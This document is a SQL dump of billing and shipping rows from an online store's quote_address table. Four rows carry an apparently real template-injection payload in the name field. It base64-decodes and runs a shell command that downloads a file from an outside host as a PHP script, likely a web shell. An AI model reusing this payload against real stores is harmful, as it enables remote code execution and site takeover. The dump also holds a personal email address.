(271, 317, '2023-09-02 04:00:18', '2023-09-02 04:00:18', 76, 0, NULL, 'billing', 'al.e.x.a.n.d.ra.gonost.a.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(272, 317, '2023-09-02 04:00:18', '2023-09-02 04:00:18', 76, 0, NULL, 'shipping', 'al.e.x.a.n.d.ra.gonost.a.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(273, 318, '2023-09-03 04:21:45', '2023-09-03 04:21:45', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(274, 318, '2023-09-03 04:21:45', '2023-09-03 04:21:45', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(275, 319, '2023-09-03 14:58:59', '2023-09-03 14:58:59', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(276, 319, '2023-09-03 14:58:59', '2023-09-03 14:58:59', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(277, 320, '2023-09-04 11:08:13', '2023-09-04 11:08:13', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(278, 320, '2023-09-04 11:08:13', '2023-09-04 11:08:13', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(279, 321, '2023-09-05 13:01:48', '2023-09-05 13:01:48', 77, 0, NULL, 'billing', 'a.le.x.an.d.r.a.go.n.ost.a.eva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(280, 321, '2023-09-05 13:01:48', '2023-09-05 13:01:48', 77, 0, NULL, 'shipping', 'a.le.x.an.d.r.a.go.n.ost.a.eva@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(281, 322, '2023-09-11 00:20:20', '2023-09-11 00:20:20', 78, 0, NULL, 'billing', 'a.lex.an.d.ra.go.n.osta.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(282, 322, '2023-09-11 00:20:20', '2023-09-11 00:20:20', 78, 0, NULL, 'shipping', 'a.lex.an.d.ra.go.n.osta.e.v.a@gmail.com', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(283, 323, '2023-09-13 03:01:27', '2023-09-13 03:01:27', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyBwMGszO3dnZXQgaHR0cHM6Ly93d3cubnpoLmNhL2luZm8udHh0IC1PIGFzdS5waHA=)}}', NULL, 'sss', NULL, 'ssd', 'assasad', 'asdsad', NULL, NULL, '90210', 'US', '84389299922', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(284, 323, '2023-09-13 03:01:27', '2023-09-13 03:01:38', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyBwMGszO3dnZXQgaHR0cHM6Ly93d3cubnpoLmNhL2luZm8udHh0IC1PIGFzdS5waHA=)}}', NULL, 'sss', NULL, 'ssd', 'assasad', 'asdsad', NULL, 569, '90210', 'US', '84389299922', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 59.0000, 59.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(285, 324, '2023-09-18 14:43:02', '2023-09-18 14:43:02', NULL, 0, NULL, 'billing', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyBwMGszO3dnZXQgaHR0cHM6Ly93d3cubnpoLmNhL2luZm8udHh0IC1PIGFzdS5waHA=)}}', NULL, 'sss', NULL, 'ssd', 'assasad', 'asdsad', NULL, NULL, '2055', 'AU', '84389299922', NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(286, 324, '2023-09-18 14:43:03', '2023-09-18 14:43:11', NULL, 0, NULL, 'shipping', NULL, NULL, '{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(base64_decode).addAfterFilterCallback(passthru).filter(ZWNobyBwMGszO3dnZXQgaHR0cHM6Ly93d3cubnpoLmNhL2luZm8udHh0IC1PIGFzdS5waHA=)}}', NULL, 'sss', NULL, 'ssd', 'assasad', 'asdsad', 'Australian Capital Territory', 569, '2055', 'AU', '84389299922', NULL, 0, 0, 'flatrate_flatrate', 'Flat Rate - Fixed', 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 5.0000, 5.0000, 0.0000, 0.0000, 0.0000, 0.0000, 59.0000, 59.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 5.0000, 5.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(287, 325, '2023-10-04 10:07:54', '2023-10-04 10:07:54', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(288, 325, '2023-10-04 10:07:55', '2023-10-04 10:07:55', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(289, 326, '2023-10-05 06:18:06', '2023-10-05 06:18:06', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(290, 326, '2023-10-05 06:18:06', '2023-10-05 06:18:06', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(291, 327, '2023-10-05 06:52:15', '2023-10-05 06:52:15', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(292, 327, '2023-10-05 06:52:15', '2023-10-05 06:52:15', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 2.0000, 108.0000, 108.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 108.0000, 108.0000, NULL, '[]', NULL, 0.0000, 0.0000, 108.0000, 108.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(293, 328, '2023-10-08 04:50:32', '2023-10-08 04:50:32', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(294, 328, '2023-10-08 04:50:32', '2023-10-08 04:50:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(295, 329, '2023-10-09 16:45:53', '2023-10-09 16:45:53', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(296, 329, '2023-10-09 16:45:53', '2023-10-09 16:45:53', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(297, 330, '2023-10-19 04:22:11', '2023-10-19 04:22:11', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(298, 330, '2023-10-19 04:22:11', '2023-10-19 04:22:11', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 727.0000, 59343.0000, 59343.0000, 47474.4000, 47474.4000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -11868.6000, -11868.6000, 47474.4000, 47474.4000, NULL, '[]', NULL, 0.0000, 0.0000, 59343.0000, 59343.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(299, 331, '2023-11-07 08:36:29', '2023-11-07 08:36:29', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(300, 331, '2023-11-07 08:36:29', '2023-11-07 08:36:29', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(301, 332, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(302, 332, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(303, 333, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(304, 333, '2023-11-07 08:36:30', '2023-11-07 08:36:30', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(305, 334, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(306, 335, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(307, 334, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(308, 335, '2023-11-07 08:36:31', '2023-11-07 08:36:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 100.0000, 111.0000, 111.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 111.0000, 111.0000, NULL, '[]', NULL, 0.0000, 0.0000, 111.0000, 111.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(309, 336, '2023-11-09 13:25:23', '2023-11-09 13:25:23', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(310, 336, '2023-11-09 13:25:23', '2023-11-09 13:25:23', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 421.0000, 421.0000, 336.8000, 336.8000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -84.2000, -84.2000, 336.8000, 336.8000, NULL, '[]', NULL, 0.0000, 0.0000, 421.0000, 421.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(311, 337, '2023-11-09 17:46:52', '2023-11-09 17:46:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(312, 337, '2023-11-09 17:46:52', '2023-11-09 17:46:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 54.0000, 54.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 54.0000, 54.0000, NULL, '[]', NULL, 0.0000, 0.0000, 54.0000, 54.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
